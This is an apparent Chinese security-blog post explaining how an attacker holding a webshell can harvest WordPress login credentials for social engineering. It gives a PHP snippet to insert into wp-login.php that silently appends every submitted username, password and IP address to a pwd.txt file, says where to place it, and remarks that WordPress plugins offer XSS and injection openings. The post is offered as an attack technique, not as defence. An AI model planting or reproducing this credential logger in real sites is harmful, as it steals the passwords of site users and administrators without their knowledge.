webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工
原处:http://81sec.com/read.php?115
Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。
在文件wp-login.php中539行处添加:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
就是搜索case ‘login’
在它下面直接插入即可,记录的密码生成在pwd.txt中,
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录。
个人观点:
现在wordpress的插件漏洞很多,什么xss,注入,所以wordpress还是很有搞头的...
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2032.html
记得以前在土司曾经问过这个问题 有个好心人解答了 up主能帮忙找下那个吗?
@zhonger, UP主穷逼一个木有土司账号!